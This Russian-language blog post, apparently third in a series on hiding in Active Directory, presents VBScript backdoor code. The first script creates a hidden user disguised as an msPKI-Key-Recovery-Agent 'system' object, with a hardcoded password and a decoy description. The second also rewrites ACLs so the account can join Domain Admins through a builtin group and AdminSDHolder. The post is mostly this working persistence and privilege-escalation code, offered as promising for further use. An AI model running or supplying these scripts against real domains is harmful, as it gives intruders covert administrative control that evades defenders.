Backdoor в Active Directory III

Продолжая тему из серии "прячемся в каталоге MS LDAP" [ 1, 2] нашел еще один замечательный способ скрыть свое присутствие от бдительного взора администратора домена. Речь идет про объект типа "msPKI-Key-Recovery-Agent", который визуально выглядит, как системная организационная единица и ни как не выдает себя при не целевом поиске (например, через стандартные средства поиска по каталогу). Приведенный ниже сценарий позволяет создать "скрытого" пользователя, как показано на картинке.


name='more'>

<br /> On Error Resume Next<br /> <br /> username = "PT"<br /> password = "P@ssw0rd"<br /> userDN = "cn=Program Data"<br /> <br /> Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN<br /> Set objSysInfo = CreateObject("ADSystemInfo")<br /> strUserDN = objSysInfo.userName<br /> Set objUser = GetObject("LDAP://" & strUserDN)<br /> <br /> Set objRoot = GetObject("LDAP://rootDSE")<br /> Set objContainer = GetObject("LDAP://" & userDN & "," & objRoot.Get("defaultNamingContext")) <br /> <br /> Set objUserCreate = objContainer.Create("msPKI-Key-Recovery-Agent", "cn=Configuration")<br /> objUserCreate.Put "sAMAccountName", username<br /> objUserCreate.SetInfo<br /> On Error Resume Next<br /> <br /> objUserCreate.SetPassword password<br /> objUserCreate.Put "userAccountControl", 66048<br /> objUserCreate.Put "description", "Default location for configuration application data."<br /> objUserCreate.SetInfo<br /> On Error Resume Next<br /> <br />

В совокупности с идеями, предлагаемыми ранее, данный подход видится мне довольно перспективным.

<br /> On Error Resume Next<br /> <br /> username = "PT"<br /> password = "P@ssw0rd"<br /> userDN = "cn=Program Data"<br /> <br /> joinGroupDN = "cn=Terminal Server License Servers, cn=Builtin"<br /> joinGroup = "BUILTINTerminal Server License Servers"<br /> <br /> adminsGroup = "CN=Domain Admins,CN=Users"<br /> <br /> Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN<br /> Set objSysInfo = CreateObject("ADSystemInfo")<br /> strUserDN = objSysInfo.userName<br /> Set objUser = GetObject("LDAP://" & strUserDN)<br /> <br /> Set objRoot = GetObject("LDAP://rootDSE")<br /> Set objContainer = GetObject("LDAP://" & userDN & "," & objRoot.Get("defaultNamingContext")) <br /> <br /> Set objUserCreate = objContainer.Create("msPKI-Key-Recovery-Agent", "cn=Configuration")<br /> objUserCreate.Put "sAMAccountName", username<br /> objUserCreate.SetInfo<br /> On Error Resume Next<br /> <br /> objUserCreate.SetPassword password<br /> objUserCreate.Put "userAccountControl", 66048<br /> objUserCreate.Put "description", "Default location for configuration application data."<br /> objUserCreate.SetInfo<br /> On Error Resume Next<br /> <br /> GroupAddAce joinGroupDN,username<br /> GroupAddAce adminsGroup,joinGroup<br /> GroupAddAce "CN=AdminSDHolder,CN=System",joinGroup<br /> <br /> Function GroupAddAce(toGroup,forGroup)<br /> Dim objSdUtil, objSD, objDACL, objAce<br /> Set objGroup = GetObject ("LDAP://" & toGroup & "," & objRoot.Get("defaultNamingContext")) <br /> <br /> Set objSdUtil = GetObject(objGroup.ADsPath)<br /> Set objSD = objSdUtil.Get("ntSecurityDescriptor")<br /> Set objDACL = objSD.DiscretionaryACL<br /> Set objAce = CreateObject("AccessControlEntry")<br /> <br /> objAce.Trustee = forGroup<br /> objAce.AceFlags = 0<br /> objAce.AceType = 5<br /> objAce.AccessMask = 32<br /> objAce.Flags = 1<br /> objAce.ObjectType = "{BF9679C0-0DE6-11D0-A285-00AA003049E2}"<br /> objDacl.AddAce objAce<br /> <br /> objSD.DiscretionaryAcl = objDacl<br /> objSDUtil.Put "ntSecurityDescriptor", Array(objSD)<br /> objSDUtil.SetInfo<br /> <br /> End Function<br /> <br />